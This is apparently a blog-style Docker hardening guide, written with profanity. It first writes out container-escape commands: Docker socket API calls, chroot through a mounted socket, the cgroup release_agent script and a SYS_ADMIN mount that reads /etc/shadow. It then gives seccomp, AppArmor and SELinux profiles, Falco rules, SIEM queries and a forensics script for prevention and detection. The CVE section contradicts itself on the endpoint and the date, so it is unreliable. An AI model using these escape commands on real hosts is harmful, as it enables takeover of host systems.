Docker Container Escape Prevention - Security Hardening Guide

March 2024. Tuesday morning. Coffee in hand. Got paged because our AWS bill hit $47K overnight instead of the usual $2K. Turned out a container in our staging environment was running privileged mode for "debugging purposes" and got compromised through an exposed Redis instance. The attacker escaped the container and deployed Monero miners across 200+ EC2 instances.

Here's what actually happens when containers break out:

The "Holy Shit" Moment: CVE-2025-9074 (Two Days Ago)

CVE-2025-9074 hit Docker Desktop with a critical 9.3 CVSS score. Docker Desktop users running malicious containers can now access the host through an unauthenticated API endpoint at http://192.168.65.7:2375/. Two HTTP POST requests with curl, and you own the Windows host. That's it. No special privileges required inside the container. Security researchers at LinuxSecurity confirmed this bypass affects all major Windows installations running Docker Desktop.

## From inside ANY container on Docker Desktop:
## Step 1: Create container with host filesystem access
curl -H "Content-Type: application/json" \
  --unix-socket /var/run/docker.sock \
  -d '{"Image":"alpine","Cmd":["sh"],"HostConfig":{"Binds":["C:\:/host"]}}' \
  -X POST /v1.40/containers/create

## Step 2: Start the malicious container  
curl --unix-socket /var/run/docker.sock \
  -X POST /v1.40/containers/{container_id}/start

That's a fucking container escape. From zero privileges to mounting the entire C: drive.

Runtime Socket Escapes (The Classic)

Every fucking team does this. Mount the Docker socket "for monitoring" or "for CI/CD" and wonder why containers can create new privileged containers. OWASP Container Security lists this as the #1 misconfiguration, and CIS Docker Benchmark specifically warns against socket mounting in production. Container security researchers consistently identify socket mounting as the most common attack vector.

The mistake:

docker run -v /var/run/docker.sock:/var/run/docker.sock myapp

The exploit: Any process inside that container can now create new containers with host filesystem access:

## Inside the container:
docker run -it -v /:/host alpine chroot /host /bin/bash

Real incident: Last year, a developer mounted the Docker socket for a CI container. An npm dependency got compromised and downloaded a script that created 50 privileged containers mining cryptocurrency. Detected it after $18K in compute charges.

Privileged Container Breakouts

Containers running with --privileged flag have full access to all device files and can disable security mechanisms. Docker's security documentation explicitly warns against privileged mode in production. NIST SP 800-190 identifies privileged containers as a critical security risk, and Kubernetes security best practices recommend blocking privileged access through Pod Security Standards. Security research by Aqua demonstrates multiple escape vectors specific to privileged containers.

The mistake:

docker run --privileged myapp

The exploit - cgroup release_agent escape:

## Create cgroup and enable release_agent trigger
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
echo 1 > /tmp/cgrp/notify_on_release

## Get host path from container perspective 
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

## Set release_agent to run command on host
echo "$host_path/cmd" > /tmp/cgrp/release_agent

## Create exploit payload
echo '#!/bin/sh' > /cmd
echo 'ps aux > $host_path/output' >> /cmd
chmod a+x /cmd

## Trigger the release_agent (runs on host as root)
sh -c "echo \$\$ > /tmp/cgrp/cgroup.procs"

Real cost: Production container got root shell on host through this exact technique. Attacker installed persistent backdoor that survived container restarts for 3 months before we caught it.

User Namespace Remapping Failures

Most people think user namespaces solve everything. They're wrong. Linux kernel documentation details namespace isolation mechanisms, but container security analysis by IBM shows common remapping failures lead to privilege escalation.

The config that seems secure:

{
  "userns-remap": "default"
}

The reality: If you mount host directories with the same UID/GID, you're fucked:

docker run -v /etc:/host-etc alpine
## Now container root == host UID 100000, but mounted files keep original ownership
ls -la /host-etc/shadow  # Still owned by host root (UID 0), not container root

The bypass: Create a container with UID 0 mapping and you can modify host files through mounted volumes.

Capability-Based Escapes

Docker drops dangerous capabilities by default, but many apps need specific ones restored. Problem: even "safe" capabilities can be chained for escapes.

The example: CAP_SYS_ADMIN seems necessary for your app, right?

docker run --cap-add SYS_ADMIN myapp

The exploit: CAP_SYS_ADMIN allows mounting filesystems:

## Mount host root filesystem  
mkdir /tmp/host
mount /dev/sda1 /tmp/host

## Now access host files
cat /tmp/host/etc/shadow

Real vulnerability hunting: CVE-2019-5736 allowed container escape through runC exploitation. CVE-2022-0185 was a Linux kernel flaw that let containers write to arbitrary host filesystem locations.

Host Device Access

Mounting host devices gives containers direct hardware access, bypassing containerization entirely.

The configuration:

docker run -v /dev:/dev myapp  # "For hardware access"

The result: Container can now write directly to host disk, modify boot sectors, access raw memory, etc.

procfs and sysfs Information Leaks

These seem harmless but leak critical host information:

## Host kernel version, running processes
cat /proc/version
ps aux  # Shows ALL host processes in privileged containers

## Network interfaces, routing tables  
cat /proc/net/route

## Host filesystem mounts
cat /proc/mounts

## Hardware information
ls /sys/class/net/  # Host network interfaces

Attack chain: Information gathering → privilege escalation → container escape

These aren't theoretical. These are the exact techniques used in real attacks against production systems. Every single one has cost companies thousands in AWS bills, incident response, and reputation damage.

After getting burned multiple times, here's the security configuration that prevents 90% of container escapes. These aren't theoretical recommendations - this is what we run in production after learning from expensive mistakes.

The Nuclear Option: Secure by Default Container

Here's our production container template that actually prevents escapes:

docker run \
  --read-only \
  --tmpfs /tmp:noexec,nosuid,size=50m \
  --tmpfs /var/tmp:noexec,nosuid,size=10m \
  --user 10001:10001 \
  --cap-drop ALL \
  --cap-add CHOWN \
  --cap-add SETUID \
  --cap-add SETGID \
  --security-opt=no-new-privileges:true \
  --security-opt=seccomp:seccomp-profile.json \
  --security-opt=apparmor:docker-default \
  --memory=256m \
  --cpus=1 \
  --pids-limit=50 \
  --ulimit nofile=1024:2048 \
  --ulimit nproc=50 \
  --restart=on-failure:3 \
  --network=custom-network \
  --log-driver=syslog \
  --log-opt syslog-address=udp://log-server:514 \
  myapp:latest

Every single flag matters. Let me explain why:

User Configuration (Stop Running as Root)

The Problem: 87% of production containers run as root because developers are lazy. Docker security best practices recommend non-root users for all production workloads. NIST guidelines mandate least-privilege principles, and CIS Docker Benchmark scores running as root as a critical security failure.

The Solution:

FROM alpine:3.18
RUN adduser -D -s /bin/sh -u 10001 appuser
USER appuser
WORKDIR /app

Production Reality: Volume mounts break if you have hardcoded UIDs in host filesystem permissions. Solution: Use user namespace remapping or fix your fucking file permissions.

## Enable user namespace remapping globally
echo \"dockerd --userns-remap=default\" > /etc/systemd/system/docker.service.d/userns.conf

## Or map specific range
echo \"dockerd --userns-remap=10001:10001\" > /etc/systemd/system/docker.service.d/userns.conf

Linux Security Modules (LSM) Configuration

AppArmor Profile (Ubuntu/Debian):
AppArmor documentation provides comprehensive security profiles. Ubuntu's security team maintains container-specific profiles, and Docker's AppArmor integration enables policy enforcement:

## Generate AppArmor profile
aa-genprof docker-container

## Create custom profile
cat > /etc/apparmor.d/docker-myapp << 'EOF'
#include <tunables/global>

profile docker-myapp flags=(attach_disconnected,mediate_deleted) {
  #include <abstractions/base>
  
  # Network access
  network inet tcp,
  network inet udp,
  
  # File access (restrictive)
  /app/** r,
  /tmp/** rw,
  /var/tmp/** rw,
  
  # Deny dangerous paths
  deny /proc/sys/** w,
  deny /sys/** w,
  deny /dev/** w,
  deny /etc/** w,
  
  # Allow specific capabilities only
  capability chown,
  capability setuid,
  capability setgid,
}
EOF

## Load profile
apparmor_parser -r -W /etc/apparmor.d/docker-myapp

SELinux Configuration (RHEL/CentOS):

## Enable SELinux enforcement
setsebool -P docker_connect_any 1

## Create custom SELinux policy
cat > docker-myapp.te << 'EOF'
module docker-myapp 1.0;

require {
    type container_t;
    type proc_t;
    type sysfs_t;
    class dir { read getattr };
    class file { read write };
}

## Allow container to read proc/sys
allow container_t proc_t:dir { read getattr };
allow container_t proc_t:file read;

## Deny write to sysfs
dontaudit container_t sysfs_t:file write;
EOF

## Compile and install
checkmodule -M -m -o docker-myapp.mod docker-myapp.te
semodule_package -o docker-myapp.pp -m docker-myapp.mod
semodule -i docker-myapp.pp

Seccomp Profiles (System Call Filtering)

Default Docker seccomp is okay, but custom profiles are better:

{
  \"defaultAction\": \"SCMP_ACT_ERRNO\",
  \"syscalls\": [
    {
      \"names\": [
        \"accept\", \"accept4\", \"access\", \"arch_prctl\", \"bind\", \"brk\",
        \"chdir\", \"chmod\", \"chown\", \"clock_getres\", \"clock_gettime\",
        \"clone\", \"close\", \"connect\", \"dup\", \"dup2\", \"dup3\", \"execve\",
        \"exit\", \"exit_group\", \"fchmod\", \"fchown\", \"fcntl\", \"fstat\",
        \"futex\", \"getcwd\", \"getdents\", \"getdents64\", \"getgid\",
        \"getpeername\", \"getpid\", \"getppid\", \"getrlimit\", \"getsid\",
        \"getsockname\", \"getsockopt\", \"gettid\", \"gettimeofday\", \"getuid\",
        \"listen\", \"lseek\", \"lstat\", \"madvise\", \"mkdir\", \"mlock\",
        \"mmap\", \"mprotect\", \"munmap\", \"nanosleep\", \"open\", \"openat\",
        \"pipe\", \"poll\", \"prctl\", \"pread64\", \"pwrite64\", \"read\",
        \"readlink\", \"readlinkat\", \"recv\", \"recvfrom\", \"recvmsg\",
        \"rename\", \"rmdir\", \"rt_sigaction\", \"rt_sigprocmask\", \"rt_sigreturn\",
        \"sched_yield\", \"select\", \"send\", \"sendmsg\", \"sendto\",
        \"setgid\", \"setuid\", \"setsid\", \"setsockopt\", \"shutdown\",
        \"sigaltstack\", \"socket\", \"stat\", \"statfs\", \"time\", \"uname\",
        \"unlink\", \"wait4\", \"write\", \"writev\"
      ],
      \"action\": \"SCMP_ACT_ALLOW\"
    }
  ]
}

Save to /etc/docker/seccomp-profiles/default.json

Capability Management (Drop Everything, Add Minimally)

Default Docker capabilities are too permissive:

## See what capabilities your app actually needs
docker run --cap-drop ALL myapp  # Will fail with permission errors
## Add capabilities one by one until it works
docker run --cap-drop ALL --cap-add CHOWN myapp  # Still fails?
docker run --cap-drop ALL --cap-add CHOWN --cap-add SETUID myapp  # Works!

Dangerous capabilities to NEVER add:

• SYS_ADMIN - Mount filesystems, load kernel modules
• SYS_PTRACE - Debug other processes, inject code
• SYS_MODULE - Load kernel modules
• DAC_OVERRIDE - Bypass file permissions
• NET_RAW - Create raw sockets, spoof packets

Resource Limits (Prevent DoS)

Memory and CPU limits prevent resource exhaustion attacks:

## Docker
--memory=256m --memory-swap=256m  # No swap
--cpus=1.0  # 1 CPU core max
--oom-kill-disable=false  # Let OOM killer work

## Kubernetes
resources:
  requests:
    memory: \"128Mi\"
    cpu: \"100m\" 
  limits:
    memory: \"256Mi\"
    cpu: \"500m\"

Process and file descriptor limits:

--pids-limit=50  # Max 50 processes
--ulimit nofile=1024:2048  # Max 1024 open files (soft), 2048 (hard)
--ulimit nproc=50  # Max 50 processes per user

Runtime Security Tools

gVisor (Google's sandbox):
Performance drops 30-70% but provides strong isolation. Google's research paper details the security model, and independent benchmarks confirm performance trade-offs. CNCF security analysis validates gVisor's isolation capabilities:

## Follow the official installation guide: https://gvisor.dev/docs/user_guide/install/
## Install gVisor via official packages
curl -fsSL https://gvisor.dev/archive.key | gpg --dearmor -o /usr/share/keyrings/gvisor-archive-keyring.gpg
apt-get update && apt-get install -y runsc

## Configure Docker to use gVisor
echo '{
  \"runtimes\": {
    \"runsc\": {
      \"path\": \"/usr/local/bin/runsc\",
      \"runtimeArgs\": [
        \"--debug-log=/tmp/runsc.log\"
      ]
    }
  }
}' > /etc/docker/daemon.json

systemctl restart docker

## Run containers with gVisor
docker run --runtime=runsc alpine

Firecracker (AWS's micro-VM):

Better isolation than containers, similar performance. AWS's Firecracker research demonstrates security benefits over traditional containers, and the original paper details performance characteristics:

## Install Firecracker
wget https://github.com/firecracker-microvm/firecracker/releases/download/v1.4.0/firecracker-v1.4.0-x86_64.tgz
tar -xzf firecracker-v1.4.0-x86_64.tgz
cp release-v1.4.0-x86_64/firecracker-v1.4.0-x86_64 /usr/local/bin/firecracker

## Use with containerd
containerd config default > /etc/containerd/config.toml
## Edit config.toml to add Firecracker runtime

Docker Daemon Hardening

Secure daemon configuration:

{
  \"icc\": false,
  \"log-level\": \"info\",
  \"storage-driver\": \"overlay2\",
  \"userland-proxy\": false,
  \"no-new-privileges\": true,
  \"seccomp-enabled\": true,
  \"selinux-enabled\": true,
  \"userns-remap\": \"default\",
  \"live-restore\": true,
  \"default-runtime\": \"runsc\",
  \"runtimes\": {
    \"runsc\": {
      \"path\": \"/usr/local/bin/runsc\"
    }
  }
}

Disable inter-container communication by default, enable explicitly:

docker network create --driver bridge --internal secure-network
docker run --network=secure-network myapp

Host System Hardening

Kernel hardening parameters:

cat >> /etc/sysctl.conf << 'EOF'
## Restrict dmesg to prevent information leaks
kernel.dmesg_restrict = 1

## Hide kernel addresses  
kernel.kptr_restrict = 2

## Disable kernel module loading
kernel.modules_disabled = 1

## Enable ASLR
kernel.randomize_va_space = 2

## Restrict ptrace to prevent container debugging
kernel.yama.ptrace_scope = 2
EOF

sysctl -p

File system permissions:

## Protect Docker daemon socket
chown root:docker /var/run/docker.sock
chmod 660 /var/run/docker.sock

## Secure Docker directories
chmod 700 /var/lib/docker
chmod 644 /etc/docker/daemon.json

This isn't theoretical security theater. This configuration actually prevents the escape techniques I showed earlier. Each setting addresses specific attack vectors we've seen used in production incidents.

Performance Impact: Yes, secure containers are slower. gVisor drops performance 70%. User namespaces break some apps. Capability restrictions require code changes. But the alternative is paying ransomware demands or explaining to executives why attackers own your infrastructure.

Implementation Strategy: Start with resource limits and non-root users. Add LSM profiles gradually. Test gVisor in staging. Don't deploy everything at once or you'll break shit and get blamed when apps stop working.

Detection is your last line of defense. When prevention fails - and it will - you need to catch container escapes before attackers establish persistence or exfiltrate data. This is my personal hell: trying to monitor ephemeral containers that spawn and die constantly while filtering out 50 alerts per day about legitimate container operations.

Runtime security monitoring has become essential with the rise in container attacks. NIST guidelines mandate continuous monitoring for production workloads, and CNCF security recommendations emphasize behavioral analysis over static configuration checks.

Runtime Security Monitoring

Falco - The Standard for Container Runtime Security:

Falco detects suspicious behavior in real-time using eBPF and system calls. CNCF project documentation provides comprehensive rule examples, and runtime security best practices recommend Falco for production monitoring:

## /etc/falco/falco_rules.yaml
- rule: Container Privilege Escalation 
  desc: Container running with new privileges
  condition: >
    spawned_process and container and
    (proc.aname=su or proc.aname=sudo) and
    not user_known_system_user_so_privileges_expected
  output: >
    Container privilege escalation (user=%user.name command=%proc.cmdline 
    container=%container.name image=%container.image.repository)
  priority: WARNING

- rule: Container Escape via Mount
  desc: Detect mount operations that could indicate container escape
  condition: >
    spawned_process and container and
    proc.name in (mount, umount) and
    (proc.args contains \"/proc\" or proc.args contains \"/sys\" or 
     proc.args contains \"/dev\" or proc.args contains \"/\")
  output: >
    Potential container escape via mount (command=%proc.cmdline 
    container=%container.name)
  priority: CRITICAL

- rule: Container Accessing Host Network
  desc: Container attempting to access host network namespace
  condition: >
    open_read and container and
    (fd.name=/proc/net/tcp or fd.name=/proc/net/udp or 
     fd.name startswith /proc/net/)
  output: >
    Container accessing host network info (file=%fd.name 
    container=%container.name process=%proc.name)
  priority: WARNING

Custom rules for specific escape vectors:

## Detect cgroup manipulation (release_agent escape)
- rule: Cgroup Release Agent Escape
  desc: Detect manipulation of cgroup release_agent for container escape
  condition: >
    open_write and
    fd.name endswith /release_agent and
    container
  output: >
    Possible container escape via cgroup release_agent 
    (file=%fd.name command=%proc.cmdline container=%container.name)
  priority: CRITICAL

## Detect Docker socket access from containers
- rule: Docker Socket Access from Container
  desc: Container accessing Docker daemon socket
  condition: >
    open_read and container and
    fd.name=/var/run/docker.sock
  output: >
    Container accessing Docker socket (container=%container.name 
    command=%proc.cmdline)
  priority: CRITICAL

## Detect privileged container spawning
- rule: Privileged Container Started
  desc: Privileged container started, potential escape risk
  condition: >
    container and
    ka.target.resource=containers and
    ka.verb=create and
    ka.req.containers.securityContext.privileged=true
  output: >
    Privileged container created (container=%ka.target.name 
    user=%ka.user.name)
  priority: HIGH

Deploy Falco:

## Kubernetes deployment
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
helm install falco falcosecurity/falco \
  --set falco.grpc.enabled=true \
  --set falco.grpcOutput.enabled=true

## Docker deployment
docker run --rm -i -t \
  --privileged \
  -v /var/run/docker.sock:/host/var/run/docker.sock \
  -v /dev:/host/dev \
  -v /proc:/host/proc:ro \
  -v /boot:/host/boot:ro \
  -v /lib/modules:/host/lib/modules:ro \
  -v /usr:/host/usr:ro \
  -v /etc:/host/etc:ro \
  falcosecurity/falco:latest

Log Analysis and SIEM Integration

Centralized logging is crucial for container security investigations. ELK Stack integration provides comprehensive log analysis, and Splunk container monitoring offers enterprise-grade SIEM capabilities. NIST incident response guidelines mandate log retention for forensic analysis.

Centralized logging setup:

## Docker daemon logging
cat > /etc/docker/daemon.json << 'EOF'
{
  \"log-driver\": \"syslog\",
  \"log-opts\": {
    \"syslog-address\": \"tcp://logstash:5000\",
    \"tag\": \"docker/{{.Name}}\"
  }
}
EOF

## Container-specific logging
docker run \
  --log-driver=fluentd \
  --log-opt fluentd-address=logstash:24224 \
  --log-opt tag=container.myapp \
  myapp

ELK Stack queries for container escapes:

## Elasticsearch query for privilege escalation
{
  \"query\": {
    \"bool\": {
      \"must\": [
        {\"match\": {\"container.name\": \"*\"}},
        {\"terms\": {\"process.name\": [\"su\", \"sudo\", \"mount\", \"nsenter\"]}},
        {\"range\": {\"@timestamp\": {\"gte\": \"now-1h\"}}}
      ]
    }
  }
}

## Query for suspicious file access
{
  \"query\": {
    \"bool\": {
      \"must\": [
        {\"wildcard\": {\"file.path\": \"/proc/*\"}},
        {\"match\": {\"container.id\": \"*\"}},
        {\"terms\": {\"event.action\": [\"opened\", \"modified\"]}}
      ]
    }
  }
}

Splunk queries:

## Container escape detection
index=docker source=*/var/log/docker* 
| regex _raw=\"(mount|nsenter|chroot|unshare)\" 
| eval container_escape_score=case(
    match(_raw, \"mount.*proc\"), 10,
    match(_raw, \"nsenter\"), 8,
    match(_raw, \"chroot.*host\"), 9,
    1=1, 0
  )
| where container_escape_score > 5

## Privilege escalation in containers
index=docker container_name=*
| regex _raw=\"(sudo|su|setuid)\" 
| stats count by container_name, user, process
| where count > 5

Host-Based Intrusion Detection

AIDE (Advanced Intrusion Detection Environment):

## Monitor critical host files
cat > /etc/aide/aide.conf << 'EOF'
## Docker daemon and configuration
/usr/bin/docker f+p+u+g+s+m+c+md5+sha1
/etc/docker p+i+n+u+g+s+m+c+md5+sha1
/var/lib/docker p+i+n+u+g+s+m+c+md5+sha1

## Container runtime
/usr/bin/containerd f+p+u+g+s+m+c+md5+sha1  
/usr/bin/runc f+p+u+g+s+m+c+md5+sha1

## Critical system files
/etc/passwd f+p+u+g+s+m+c+md5+sha1
/etc/shadow f+p+u+g+s+m+c+md5+sha1
/etc/sudoers f+p+u+g+s+m+c+md5+sha1

## LSM configurations
/etc/apparmor.d p+i+n+u+g+s+m+c+md5+sha1
/etc/selinux p+i+n+u+g+s+m+c+md5+sha1
EOF

## Initialize database and run checks
aide --init
mv /var/lib/aide/aide.db.new /var/lib/aide/aide.db
aide --check  # Run daily via cron

osquery for container monitoring:

-- Monitor for new privileged containers
SELECT 
  name, 
  image, 
  privileged, 
  pid_mode,
  security_opt
FROM docker_containers 
WHERE privileged = 1 
  AND created > datetime('now', '-1 hour');

-- Check for containers with host namespace access
SELECT 
  name,
  image, 
  network_mode,
  pid_mode,
  ipc_mode
FROM docker_containers 
WHERE network_mode = 'host' 
   OR pid_mode = 'host'
   OR ipc_mode = 'host';

-- Monitor container runtime modifications
SELECT 
  path,
  action,
  time,
  uid
FROM file_events 
WHERE path LIKE '/var/lib/docker/%'
   OR path LIKE '/etc/docker/%'
   OR path = '/var/run/docker.sock';

Container Vulnerability Scanning

Trivy integration:

## CI/CD pipeline scanning
#!/bin/bash
IMAGE=$1
SEVERITY=\"CRITICAL,HIGH\"

## Scan image for vulnerabilities
trivy image --format json --severity $SEVERITY $IMAGE > scan-results.json

## Check for container escape CVEs specifically  
ESCAPE_CVES=$(jq -r '.Results[] | .Vulnerabilities[] | select(.Title | contains(\"container\") and contains(\"escape\")) | .VulnerabilityID' scan-results.json)

if [[ ! -z \"$ESCAPE_CVES\" ]]; then
    echo \"CRITICAL: Container escape vulnerabilities found:\"
    echo $ESCAPE_CVES
    exit 1
fi

## Scan running containers
trivy image --input $(docker save $IMAGE) --format table

Anchore Grype scanning:

## Production container scanning
grype $IMAGE_NAME -o json > vuln-report.json

## Filter for runtime/escape vulnerabilities
jq '.matches[] | select(.vulnerability.description | contains(\"escape\") or contains(\"privilege\")) | {id: .vulnerability.id, severity: .vulnerability.severity, description: .vulnerability.description}' vuln-report.json

Network Monitoring for Lateral Movement

Container network monitoring:

## Monitor inter-container traffic
tcpdump -i docker0 -w container-traffic.pcap

## Analyze with tshark
tshark -r container-traffic.pcap \
  -Y \"tcp.flags.syn==1\" \
  -T fields -e ip.src -e ip.dst -e tcp.dstport \
  | sort | uniq -c | sort -nr

Kubernetes network policies for monitoring:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-all-egress
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress: []
---
apiVersion: networking.k8s.io/v1  
kind: NetworkPolicy
metadata:
  name: log-suspicious-egress
spec:
  podSelector:
    matchLabels:
      monitoring: \"enabled\"
  egress:
  - to: []
    ports:
    - protocol: TCP
      port: 22    # SSH - suspicious
    - protocol: TCP  
      port: 445   # SMB - lateral movement
    - protocol: TCP
      port: 3389  # RDP - suspicious

Incident Response Automation

Container forensics script:

#!/bin/bash
## Container escape incident response

CONTAINER_ID=$1
TIMESTAMP=$(date +%Y%m%d-%H%M%S)
INCIDENT_DIR=\"/var/log/incidents/container-escape-$TIMESTAMP\"

mkdir -p $INCIDENT_DIR

## Container information
docker inspect $CONTAINER_ID > $INCIDENT_DIR/container-inspect.json
docker logs $CONTAINER_ID > $INCIDENT_DIR/container-logs.txt

## Process information
docker exec $CONTAINER_ID ps auxf > $INCIDENT_DIR/processes.txt
docker exec $CONTAINER_ID netstat -tulpn > $INCIDENT_DIR/network.txt

## File system changes
docker diff $CONTAINER_ID > $INCIDENT_DIR/filesystem-changes.txt

## Host process tree (check for escaped processes)
ps auxf | grep -E \"(docker|containerd|runc)\" > $INCIDENT_DIR/host-processes.txt

## Network connections
ss -tulpn > $INCIDENT_DIR/host-network.txt

## System calls (if available)
perf record -a -g sleep 10
perf script > $INCIDENT_DIR/syscalls.txt

## Memory dump (if container still running)
docker exec $CONTAINER_ID cat /proc/self/maps > $INCIDENT_DIR/memory-maps.txt

echo \"Incident data collected in $INCIDENT_DIR\"

False Positive Management

The reality: Container monitoring generates shitloads of false positives. Here's how to tune it:

Whitelist legitimate operations:

## Falco whitelist
- list: allowed_containers
  items: [monitoring-agent, log-collector, security-scanner]

- rule: Container Privilege Escalation
  condition: >
    spawned_process and container and
    (proc.aname=su or proc.aname=sudo) and
    not container.name in (allowed_containers) and
    not user_known_system_user_so_privileges_expected

Alert prioritization:

1. CRITICAL: Container escape attempts, privilege escalation
2. HIGH: Suspicious network activity, file system access
3. MEDIUM: Resource violations, policy violations
4. LOW: Information gathering, reconnaissance

Alerting strategy:

• CRITICAL alerts page on-call engineer immediately
• HIGH alerts create tickets for investigation within 4 hours
• MEDIUM alerts get reviewed daily
• LOW alerts get reviewed weekly or ignored

Got paged at 2am for "container escape" that turned out to be a developer running sudo apt update in a dev container. Learn from my pain: tune your alerts properly or you'll get alert fatigue and miss real attacks.